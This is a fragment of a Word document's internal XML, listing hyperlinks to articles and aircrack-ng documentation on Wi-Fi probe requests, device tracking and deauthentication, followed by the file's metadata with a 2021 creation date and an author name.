    <w:rsid w:val="003A1A43"/>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codecamp.org/news/tracking-analyzing-over-200-000-peoples-every-step-at-mit-e736a507ddbf/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mrncciew.com/2014/10/27/cwap-802-11-probe-requestresponse/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@brannondorsey/wi-fi-is-broken-3f6054210fa5" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://frdmtoplay.com/counting-wireless-devices-on-a-raspberry-pi-with-tcpdump/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aircrack-ng.org/doku.php?id=airmon-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aircrack-ng.org/doku.php?id=deauthentication" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackware.ru/?p=74"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35C6AXIP9KRcubpiIoLexjEMQ==">AMUW2mWL84GrC61qH3OL07UwvePwy3pWA3ayoOD1XOdu11o5P4yvUiHTyAZgzBBPkRfhYaS6gu59BLDFsmQBdAQ6KR0N4gLauT8mz8sbviBSzralim3Mav9TPYixkNrJSPEl0rPtzlifT/EjtIw8MhMnIhrG86cZgsI6Tn7xMsjKfqSVaijzyBP33Lpvus9x0vpx0SI+cRukgFeK0sXynBdy3JDtYyZtq3Yw7qUh28nGcBkBPNU6ZOJpun83SfiFBcaDDyrcf3Yz6zydlqD+S9yPQzNjxxIa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2021-06-21T23:54:00Z</dcterms:created>
  <dc:creator>Сысоев Алексей Андреевич</dc:creator>
</cp:coreProperties>
</file>